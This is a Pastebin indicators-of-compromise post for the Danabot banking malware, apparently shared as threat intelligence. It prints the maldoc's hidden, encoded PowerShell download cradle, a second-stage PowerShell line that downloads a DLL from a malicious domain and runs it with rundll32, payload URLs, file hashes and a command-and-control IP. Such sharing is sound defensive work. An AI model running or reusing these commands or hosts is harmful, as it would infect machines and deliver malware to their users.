ExecuteMalware

2021-08-12 Danabot IOCs

Aug 12th, 2021 (edited)
14,367
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.39 KB | None | 0 0
  1. THREAT IDENTIFICATION: DANABOT
  2.  
  3. SUBJECTS OBSERVED
  4. Study the report very urgently - hV8W
  5.  
  6. SENDERS OBSERVED
  7.  
  8. ATTACHED MALDOC FILE HASHES
  9. 9789789.zip
  10. e2dd6e94fcc2851d7e2258c8abe1faf5
  11.  
  12. Which contains:
  13. 12.08 - Reports.js
  14. aeeef159543b28995b1f742085a2c6a0
  15.  
  16. POWERSHELL COMMAND FROM THE MALDOC
  17. poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAG8AbgB1AHMAZQBzAGYAbwB1AG4AZAAuAG0AbAAvAHUAcABkAGEAdABlAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
  18.  
  19. NEXT LEVEL MALDOC DOWNLOAD URL
  20. http://www.bonusesfound.ml/update/index.php
  21.  
  22. This returns:
  23. $path = $Env:temp '\ZGOPQv.bin'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://www.bonusesfound.ml/update/update.dll',$path); C:\Windows\System32\rundll32.exe $path,S
  24.  
  25. DANABOT PAYLOAD DOWNLOAD URL
  26. http://www.bonusesfound.ml/update/update.dll
  27.  
  28. DANABOT PAYLOAD FILE HASHES
  29. update.dll
  30. c00d207efb855910154389b48404e550
  31.  
  32. Also was renamed to:
  33. AppData\Local\Temp
  34. JWScY.bin
  35. c00d207efb855910154389b48404e550
  36.  
  37. DANABOT C2
  38. From the rundll process
  39. https://192.52.167.44
  40.  
  41. SUPPORTING EVIDENCE
  42. https://www.virustotal.com/gui/file/716e5a3d29ff525aed30c18061daff4b496f3f828ba2ac763efd857062a42e96/detection
  43. https://app.any.run/tasks/042cafaf-f432-4332-8356-c3e04b55b701/
  44.  
Advertisement
Add Comment
Please, Sign In to add comment